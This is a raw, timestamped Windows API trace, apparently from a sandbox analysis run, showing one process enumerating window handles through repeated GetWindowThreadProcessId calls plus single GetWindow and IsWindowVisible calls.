	[0719.872] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x460
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1e94
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1e28
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1df8
	[0719.873] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1da8
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1c70
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x163c
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1a10
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x186c
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1d74
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4c8
	[0719.874] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1960
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1ce4
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b24
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x14e0
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x17f0
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x854
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1268
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1624
	[0719.875] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b9c
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x16f4
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x145c
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x17d0
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1d28
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xcb8
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1190
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x3a8
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1bd0
	[0719.876] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1bfc
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1a78
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b90
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b04
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b34
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1b64
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1bb0
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1acc
	[0719.877] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1a2c
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x19a8
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1944
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x18c8
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x18ac
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x18ec
	[0719.878] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1898
	[0719.882] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc98
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x153c
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1808
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x12a4
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1740
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x16c4
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1820
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x16ac
	[0719.883] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1858
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1664
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x10b4
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x10ac
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x10ec
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1068
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x17e0
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x102c
	[0719.884] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x17a4
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1050
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1694
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1770
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1720
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x165c
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1578
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x16c0
	[0719.885] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x161c
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1638
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x15c8
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1554
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1674
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1520
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x14bc
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xf8c
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe9c
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1434
	[0719.886] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x14ec
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xfcc
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x12ac
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1484
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x934
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc0c
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb08
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x948
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1178
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x13e0
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xcd0
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x13fc
	[0719.887] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xdc8
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc18
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc2c
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa1c
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1244
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xdb0
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1398
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1358
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1370
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1340
	[0719.888] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x130c
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x12c0
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x12e4
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1270
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1298
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x120c
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x122c
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x11c4
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x11b0
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1188
	[0719.889] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1148
	[0719.890] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x1160
	[0719.890] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x10fc
	[0719.890] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe34
	[0719.890] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xea4
	[0719.891] GetWindow (hWnd=0x104ac, uCmd=0x4) returned 0x0
	[0719.892] IsWindowVisible (hWnd=0x104ac) returned 0
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x514
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe48
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xbc8
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xdf8
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x318
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xcac
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x8bc
	[0719.892] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xf9c
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xf48
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe40
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xecc
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xeb8
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe80
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe98
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe60
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xee4
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xf00
	[0719.893] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xdf0
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xe1c
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xdd0
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xd94
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xd74
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xd00
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xcd8
	[0719.894] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc84
	[0719.897] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xca4
	[0719.897] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc64
	[0719.897] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xc24
	[0719.897] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb84
	[0719.897] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xbac
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x384
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xab8
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x33c
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa44
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa64
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x8a8
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xaf0
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x88c
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb04
	[0719.898] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x910
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x230
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xac0
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xab4
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xaac
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x3d0
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x978
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa7c
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x59c
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa88
	[0719.899] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa6c
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa68
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x9f8
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xa04
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x924
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x8dc
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7dc
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x768
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x764
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x820
	[0719.900] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x810
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x794
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x83c
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x7ac
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb44
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x6bc
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0xb5c
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x838
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.901] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x818
	[0719.902] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x5b8
